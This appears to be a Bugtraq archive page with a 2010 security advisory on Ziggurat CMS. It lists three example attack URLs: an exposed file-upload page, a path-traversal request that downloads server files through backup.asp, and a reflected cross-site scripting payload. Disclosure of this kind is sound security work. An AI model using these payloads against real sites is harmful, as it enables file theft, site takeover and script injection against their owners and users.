[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Ziggurat CMS Multiple Vulnerabilities

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Ziggurat CMS Multiple Vulnerabilities
From: info@xxxxxxxxxxxxxx
Date: 15 Apr 2010 08:12:56 -0000

################################################################# 
# Securitylab.ir 
################################################################# 
# Application Info: 
# Name: Ziggurat CMS
# Vendor: http://www.farsi-cms.com
#################################################################
Vulnerability: 

# Arbitrary File Upload
http://site.com/manager/upload.asp

# Remote File Download
http://site.com/manager/backup.asp?bck=./../file.asp

# Cross Site Scripting
http://site.com/index.asp?id=<script>("xss")</script>
#################################################################
# 2010-04-10 - Vendor notified
# 2010-04-15 - Public disclosure
################################################################# 
# Discoverd By: Pouya Daneshmand 
# Website: http://Pouya.Securitylab.ir 
# Contacts: info[at]securitylab.ir & whh_iran[at]yahoo.com
###################################################################

Prev by Date: [ MDVSA-2010:073-1 ] cups
Next by Date: [ MDVSA-2010:073 ] cups
Previous by thread: [ MDVSA-2010:073-1 ] cups
Next by thread: [ MDVSA-2010:073 ] cups
Index(es):
- Date
- Thread